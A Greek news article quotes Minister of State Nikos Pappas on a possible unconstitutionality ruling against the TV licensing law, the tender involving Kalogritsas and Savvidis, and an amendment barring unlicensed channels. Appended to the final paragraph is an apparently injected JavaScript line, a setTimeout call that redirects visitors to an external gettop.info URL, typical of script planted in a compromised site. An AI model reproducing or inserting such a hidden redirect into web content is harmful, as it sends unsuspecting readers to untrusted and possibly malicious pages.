Παππάς: Εάν κριθεί αντισυνταγματικός ο νόμος δεν θα είναι ευχάριστη εξέλιξη για τη λειτουργία της δημοκρατίας

0
10

 

«Αν κριθεί αντισυνταγματικός ο νόμος, δεν θα είναι μια ευχάριστη εξέλιξη για τη λειτουργία της δημοκρατίας», ανέφερε στον realfm 97.8 ο υπουργός Επικρατείας Νίκος Παππάς.

Μάλιστα, ο υπουργός έθεσε το θέμα σε ηθική βάση, καλώντας εμμέσως πλην σαφώς τη δικαιοσύνη να σταθμίσει και κοινωνικούς παράγοντες ως προς το ζήτημα, όπως π.χ. ότι ενδεχόμενη ακύρωση του νόμου θα σημάνει τη στέρηση χρημάτων από κοινωνικά προγράμματα για οικονομικά ασθενέστερους και την επιστροφή τους σε εύπορους επιχειρηματίες. «Το ΣτΕ θα επιστρέψει χρήματα σε ανθρώπους που έχουν και θα τα πάρει από προγράμματα για ανθρώπους που δεν έχουν οικονομική δυνατότητα», είπε και τόνισε πως η άποψή του δεν είναι ηθικός εκβιασμός προς τη δικαιοσύνη, τόνισε όμως με νόημα πως «θα πρέπει η δημοκρατία και η δικαιοσύνη να στέλνουν το μήνυμα πως λειτουργούν για την προστασία των αδυνάτων».

«Αποδείξαμε πως το δημόσιο μπορεί να κάνει διαγωνισμό και πως υπήρχαν άνθρωποι που ήταν πρόθυμοι να καταθέσουν τον οβολό τους και αποδείχθηκε πως η διαδικασία δεν έγινε για 27 χρόνια, ενώ μπορούσε να είχε γίνει», είπε ο κ. Παππάς, επιμένοντας πως ο διαγωνισμός είχε όλες τις απαραίτητες δικλείδες ασφαλείας, κάτι που φάνηκε και στην περίπτωση του επιλαχόντα Ιβάν Σαββίδη, ο οποίος πήρε τη θέση του κ. Καλογρίτσα που εξέπεσε. «Για πρώτη φορά υπερασπιστήκαμε έτσι το δημόσιο συμφέρον και βγαίνουν και μας καταγγέλλουν», προσέθεσε.

«Η επιλογή μας δεν μπορούσε να γίνει με το κριτήριο της εξυπηρέτησης κάποιων επιχειρηματικών συμφερόντων» σημείωσε ο κ. Παππάς και πρόσθεσε: «Διότι, υποκριτικά μπαίνει από κάποιους το θέμα της διασφάλισης των θέσεων εργασίας. Να σας εξηγήσω: Θέσεις χάνονταν διαρκώς και θα συνέχιζαν να χάνονται εάν εμείς δεν είχαμε κάνει αυτή την παρέμβαση».

Σε ό,τι αφορά την τροπολογία για τα κανάλια, ο υπουργός Επικρατείας επανέλαβε ότι: «Είμαστε ανοιχτοί να συζητήσουμε και βελτιώσεις και αλλαγές εάν προσέλθουν όλοι στο τραπέζι του διαλόγου και στη Βουλή για να συζητήσουμε. Αυτό που δεν μπορεί να γίνει, και ξέρετε, προβλεπόταν και στους προηγούμενους νόμους, ο 4070 του 2012 προβλέπει ρητά ότι σταθμοί μη αδειοδοτημένοι δεν μπορούν να εκπέμπουν, και αυτό νομίζω είναι ακριβώς η εφαρμογή της πρόβλεψης του άρθρου 15 του Συντάγματος που λέει ότι η κατοχή τηλεοπτικού σταθμού σημαίνει και προϋποθέτει την κατοχή αδείας» επισήμανε ο κ. Παππάς, προσθέτοντας ότι:

«Η τροπολογία αυτή είναι ένα βήμα για τη μετάβαση στο νέο τηλεοπτικό τοπίο. Νομίζω ότι μπορούμε και την επόμενη εβδομάδα να κάνουμε τις επαφές να εξαντλήσουμε και τα τελευταία περιθώρια για την εξεύρεση συναινέσεων και να δούμε, να συζητήσουμε όλοι μαζί, ή όσο το δυνατόν περισσότεροι μπορούμε, το πώς μπορούμε να πάμε στην επόμενη φάση». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here